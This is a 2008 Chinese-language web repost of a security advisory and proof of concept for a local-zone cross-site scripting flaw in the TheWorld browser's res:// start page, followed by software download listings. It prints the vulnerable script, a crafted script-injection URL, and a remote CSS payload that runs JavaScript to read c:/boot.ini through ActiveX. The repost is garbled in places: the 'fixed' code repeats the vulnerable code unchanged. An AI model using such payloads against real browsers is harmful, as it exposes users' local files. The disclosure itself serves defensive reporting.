世界之窗等浏览器本地xss跨域漏洞POC
互联网 发布时间:2008-10-08 20:02:20 作者:佚名 
我要评论
我要评论漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗浏览器在起始页面是以res://E:PROGRA~1THEWOR~1.0languageschs.dll
漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。
漏洞修补:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
已经用js控制DOM显示了
漏洞演示:这里提供测试方法可以读取c:/boot.ini
1 打开如下地址
sc:h’><script>alert(document.write(unescape(””)))</script>
2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash)
3 重新打开tw浏览器,可以发现http://www.80sec.com/1.css中的内容被解析,并且有本地域的权限。
1.css内容,换成其他js代码一样执行
body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}
漏洞状态:
2008-06-24通知厂商
2008-06-25修补
http://www.ioage.com/cnnew/uplog.htm
相关文章
TheWorld 世界之窗浏览器 v7.0.0.108 绿色免费版 集成flash34.0.0.321
世界之窗浏览器,是一款小巧、快速、简洁著称的国产双核浏览器,UI风格非常简约,无任何多余东西;具有体积小巧、启动速度快、打开网页快、资源占用小、使用流畅等特色,在2024-09-19
TheWorld 世界之窗浏览器 v3.6.1.1 苦菜花优化安装版
世界之窗浏览器是一款小巧、快速、安全、功能强大的多窗口浏览器,它是完全免费,没有任何功能限制的绿色软件。2013-03-21
世界之窗(极速版) TheWorld Chrome V5.0.342.5 官方安装版
大家好,转眼间又是一年过去,现在我们就要过2010年的春节了,对于从第一个版本就陪伴我们一路走来的用户朋友来说,已经五年过去了,真是光阴似箭啊! 一直以来,工作2010-04-04
世界之窗绿色增强优化版目前所有的多窗口浏览器中,只有IE7实现了多线程多窗口,既每个窗口是一个单独的线程,这样的好处是不言而喻的,可以充分利用系统资源,避免某个子2011-07-04Chrome浏览器的一个并行分支 世界之窗 TheWorld Chrome 6.2.0.112 绿色
一款多窗口浏览器,它采用IE内核,具有如下特点: 1)极小的资源占用,同时访问多个页面消耗系统内存极小 2)增强的稳定性,这对于多窗口浏览器来说尤其显得重要 3)优化的2013-11-08
多标签多窗口浏览器 世界之窗 TheWorld v4.2.0.102 绿色极速版
世界之窗浏览器极速版(也可以叫做TheWorld Chrome版),看起来像是仅仅在Google Chrome浏览器基础上更换一套默认皮肤,预置几个扩展。2011-11-02- 问:我有多个QQ,在“世界之窗”浏览器里进行QQ“好友”、“抢车位”的过程中,我发现第一个QQ没问题,第二、第三个后的QQ就仍然无法进行“好友”、“抢车位”,但我已2009-04-27
世界之窗浏览器 2.3 Final (2.3.0.7)绿色增强版_可清除隐藏文字
一些网站或论坛为了防止文章被复制,加入了隐藏文字保护机制,这样当你直接复制文字时,会附加出现一大堆隐藏的乱码,这个插件就是专门用来清除这样隐藏文字用的。站长编辑2008-09-20
世界之窗浏览器(多标签多窗口浏览器) v7.0.0.108 中文官方安装版
世界之窗浏览器是一款小巧快速、 安全稳定、功能贴心的绿色浏览器2017-02-24
最新评论